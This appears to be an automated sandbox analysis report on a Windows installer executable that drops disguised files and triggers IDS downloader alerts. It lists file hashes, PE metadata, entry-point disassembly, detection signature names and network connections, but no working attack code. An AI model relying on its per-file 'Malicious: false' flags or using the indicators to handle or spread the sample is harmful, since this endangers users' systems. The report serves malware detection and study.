Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$\|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\aktioners.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
Category:	dropped
Size (bytes):	33760
Entropy (8bit):	7.967017042537166
Encrypted:	false
SSDEEP:	768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCW:4Uom4yBhmQi7eK8q+lpJRUfCW
MD5:	B79A2EC8152E04C3DF16B5DF803ED841
SHA1:	4E8FEE2ACDA813B8D6F12FF1B2B9BEDA769C05BD
SHA-256:	584DC6A4106CFB60A2794937921B3B560F398558B482D5C24A1ECFB997EBEA9D
SHA-512:	0DFB2B2FA92EB11B60C87D272B6B2EEA14DC2E05D53048C445772D6249F3635BBD1EE7B663F9F670FCD06C50C71839323BF2325CAEECBD9AD7D182E5733C3488
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\begrdeliges.pro

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	data
Category:	dropped
Size (bytes):	271048
Entropy (8bit):	1.2501527383190683
Encrypted:	false
SSDEEP:	1536:J3Cc9bXL6XUITHsHuh6mYsN8xVvBPJggd0Q96LJe24TSewHt/z1tIwt8iWoImuhr:JGU5Q+7bgfC97p
MD5:	4CDDE62E05107CF3BAD9767453F364D5
SHA1:	8C3990C82C3F9C0ECECCFC2E878F00B674556E6E
SHA-256:	80EFA0744FB280C29C700886A6CD158053D0BE9C2D87F445A76C6DEA410B774B
SHA-512:	A3C64E4B4DB6AEA45756BFB1C2BED5F7CA19549DE8C2D095F320DB8BC8589B01E356D033D6073CBEED9B56EDA1939BEB98E727382F5396EA3E50079125B19451
Malicious:	false
Preview:	........................@..................._...........................................................................................................................................-....v......R...............B..E.........................................................................7............................u.........................................................g...(..........i........j...................................................................]...c.................................^.........t..........................a............................................$................................_.........................................................U.....T............................................B.....h.....7.................w...................................................................n/..........&..............'...n......X....................Y.............................................m.......................................W..................w..!....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\burdie.ini

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
Category:	dropped
Size (bytes):	19024
Entropy (8bit):	7.941019032399731
Encrypted:	false
SSDEEP:	384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJh:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJh
MD5:	E9772CD90D72A4F4AF0401E7BFBA7BBA
SHA1:	45DEEC11D8CE16E3DF98F6E3AC23A6B647A81535
SHA-256:	53BB5626BC226D0E476A35645C2D720C1056ADFBB23DAEB5923E9264540259B9
SHA-512:	BA2E24D412C69D2B1EBAEDBF5B7AC0F94544A3E9C42CDE2FB13C456217B6B0449024086D78C72F8B7C4EBA35622C56623919F64CE408471028E0A5DC6E206027
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i.......J..}.t...t....4..A...\|....U:.~....)......[Q.f.....K.<.0.9.D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\cartographer.jpg

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 203x671, components 3
Category:	dropped
Size (bytes):	30956
Entropy (8bit):	7.969499868102271
Encrypted:	false
SSDEEP:	768:ofYXJ6hCAlkicSla3FFc1VQC2NOF1Nuse5wExZ50vn:oQalrlaVC1uClF1NuTT5Mn
MD5:	C9D3CCBEBDAFAA919122541A202A9733
SHA1:	F81641E686DE3B8C884971EC5DA65D8CF4BB4D3F
SHA-256:	5FDB8BED6E957D3399EC0D8A30934F1E0B2A4C5880A6EC8DF43F786BAA32A96C
SHA-512:	F16B4DC339F4943E19408F386C376C50A4DA42E6DB1241EAB90B8596AF701F75421B87A1AEA10835467A3900E29E2611943DC9B89FDFAAC3E46D0546BFA83A7A
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0..6..#...(.8o+'.:.l.H.FN...... ...$.i..$-....%.q.Gj.9......O .......)...'.....f.\lG..u..>....Q....o.hC..R.FF.C..#m.k......@c.0.OA....]..r...rel.B.S....k.......Y....?xjd.X....oT5.5...t....L.5.."6g.u.*M..V.O.....Jm..Rh....0..l..kO...U.\[.-.T.5.Y.]..R.>Q.....w.5.......![q..4.O.X'..i.G..?..a..jK5.+.b. ..^.%..qQ..T...(.GsL..N..L~...\.-.......}z.\i.q@^...R{

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\histographies.txt

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
Category:	dropped
Size (bytes):	34638
Entropy (8bit):	7.9628416848799
Encrypted:	false
SSDEEP:	768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCL:4Uom4yBhmQi7eK8q+lpJRUfCL
MD5:	5A1AD1096F97C0E2239684846D247918
SHA1:	2885227167F0780AED630077007401989AFDDAEE
SHA-256:	C2C9EE1D315D2D076FAADFDECF060E59877B621385A7825EDBA473BE85CCBF7F
SHA-512:	2740807D4DCDB5D2CE786488047360225EC7DED2B84A215CCE00DB25E67C2A9B5C9C3E0593BA35F8E48D937E3104FFD97C3B034471639F88D3119F9B9C62B36B
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\icekhana.txt

Download File

Process:	C:\Users\user\Desktop\BtCQu5APhK.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
Category:	dropped
Size (bytes):	78312
Entropy (8bit):	7.965760163563921
Encrypted:	false
SSDEEP:	1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMo:I55e/pVQIhrqKusGkmkPnNYhX2g
MD5:	B53488FB78817ABDEA984B799B644E71
SHA1:	B52C3F0461B2D4827634B17A8456FE0EEACCF166
SHA-256:	37E2971FE0FE1B8F445A2D90CFEFC40A614C09F04D4269DC0E39131714B71644
SHA-512:	817F53CAA92582CE9F070493836EF6E925CCDFECA064C3CD8ADFFF1124542D61ED2F2DD2ABBCFC46F7CA700A43710EA78440BD16092AC41EA59D90C7E2BB13EC
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$\|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.8037314516273115
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BtCQu5APhK.exe
File size:	1'053'154 bytes
MD5:	c80150383af692d52bc33e7857b5724d
SHA1:	c9fc133a61844c2abe2095f803d6c6bb2ae944d0
SHA256:	225c26cf877ca85f63e80f878609f6dd2cf2ce717d4885f88a7a442d8bee03ad
SHA512:	eea0d0cf96ba7ac9cb0dd3a2e451b16e94a4a750420b3642808292ee727837e3260227a8e0af751528691e3d0089d6c01e63bf41d8ecf7424c639642a7bd8fae
SSDEEP:	24576:NtLjV8bDyBuAwmVau3a88yQigUcCZmm58YbLjs8jH1zL:NtLGvo/lHMyk0ZmgK8X
TLSH:	58252351BBC0661FF4D68E72D99F87D16372DF040652160F6B08FB2E2C789828F1A65B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	31199dedad4d2787

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FAE58BA414Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FAE58BA3DB7h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FAE58BA3DA5h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FAE58BA129Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FAE58BA37F6h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FAE58BA135Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007FAE58BA1299h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FAE58BA128Bh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x284b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0x284b8	0x28600	34185201e4ea24efa65b15898a0a01f1	False	0.5663155476006192	data	5.783399428430881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4d358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.535357269608423
RT_ICON	0x5db80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.5761509354635275
RT_ICON	0x67028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.6025878003696857
RT_ICON	0x6c4b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.6164383561643836
RT_ICON	0x706d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.6511410788381743
RT_ICON	0x72c80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.7045028142589118
RT_ICON	0x73d28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.7372950819672132
RT_ICON	0x746b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.8111702127659575
RT_DIALOG	0x74b18	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x74c60	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x74d80	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x74ea0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x74f00	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x74f78	0x238	data	English	United States	0.5422535211267606
RT_MANIFEST	0x751b0	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Version Infos

Description	Data
FileDescription	vignetted
LegalCopyright	dommedagsprdikenens johnnis
LegalTrademarks	kodes
OriginalFilename	toggler triumvirates.exe
ProductVersion	3.5.0.0
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T23:01:08.248611+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49688	142.250.184.206	443	TCP
2025-03-07T23:01:15.548465+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49690	193.122.6.168	80	TCP
2025-03-07T23:01:18.392259+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49690	193.122.6.168	80	TCP
2025-03-07T23:01:20.495274+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49692	104.21.80.1	443	TCP
2025-03-07T23:01:21.204733+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49693	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 23:01:05.340457916 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:05.340509892 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:05.340620041 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:05.355479956 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:05.355501890 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:07.507683992 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:07.507781982 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:07.508781910 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:07.508837938 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:07.666646004 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:07.666682005 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:07.667088032 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:07.667154074 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:07.671087980 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:07.716327906 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:08.248619080 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:08.248701096 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:08.248827934 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:08.248893976 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:08.250153065 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:08.250173092 CET	443	49688	142.250.184.206	192.168.2.7
Mar 7, 2025 23:01:08.250184059 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:08.250236034 CET	49688	443	192.168.2.7	142.250.184.206
Mar 7, 2025 23:01:08.276854038 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:08.276896954 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:08.277008057 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:08.277260065 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:08.277276039 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:10.034429073 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:10.034553051 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:10.090795040 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:10.090817928 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:10.091680050 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:10.091747999 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:10.094914913 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:10.136337042 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:12.978322983 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:12.978432894 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:12.985711098 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:12.985819101 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.009984970 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.010097027 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.010111094 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.010145903 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.062169075 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.062289953 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.062298059 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.062326908 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.062356949 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.062362909 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.062376022 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.062417984 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.076847076 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.076931000 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.076937914 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.076977968 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.082914114 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.082968950 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.083007097 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.083049059 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.095477104 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.095551014 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.101691961 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.101747990 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.101753950 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.101787090 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.105040073 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.105086088 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.105091095 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.105129004 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.111548901 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.111634016 CET	49689	443	192.168.2.7	172.217.16.193
Mar 7, 2025 23:01:13.111639977 CET	443	49689	172.217.16.193	192.168.2.7
Mar 7, 2025 23:01:13.111681938 CET	49689	443	192.168.2.7	172.217.16.193
